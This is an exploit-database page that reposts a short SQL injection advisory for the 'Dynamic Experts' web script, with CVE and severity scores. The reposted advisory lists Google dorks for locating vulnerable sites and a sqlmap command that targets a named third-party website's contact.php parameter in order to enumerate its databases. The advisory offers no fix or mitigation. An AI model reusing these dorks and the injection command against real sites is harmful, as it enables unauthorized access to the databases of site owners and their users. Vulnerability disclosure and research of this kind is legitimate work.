Advertisement






Dynamic Experts script SQL Injection Vulnerability

CVE Category Price Severity
CVE-2021-32952 CWE-89 $500 High
Author Risk Exploitation Type Date
Dynamic Experts High Remote 2021-03-21
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021030143

Below is a copy:

Dynamic Experts script SQL Injection Vulnerability
*********************************************************
#Exploit Title: Dynamic Experts script Sql Injection Vulnerability
#Date: 20.03.2021
#Exploit Author: Thor/Azerbaijan
#Google Dork: "Powered By Dynamic Experts"
              inurl:/"Powered By Dynamic Experts"
              intext:/"Powered By Dynamic Experts"
#Tested OS: Linux/Parrot (SQLMAP TOOL)

ERROR: Database query failed: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' LIMIT 1' at line 1

#iNJECT MODE: sqlmap -u https://zateen.com/contact.php?id=5 --dbs

********************************************************* 
#Discovered by: Tural Asadov 
#Instagram: @esedov__7.62
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum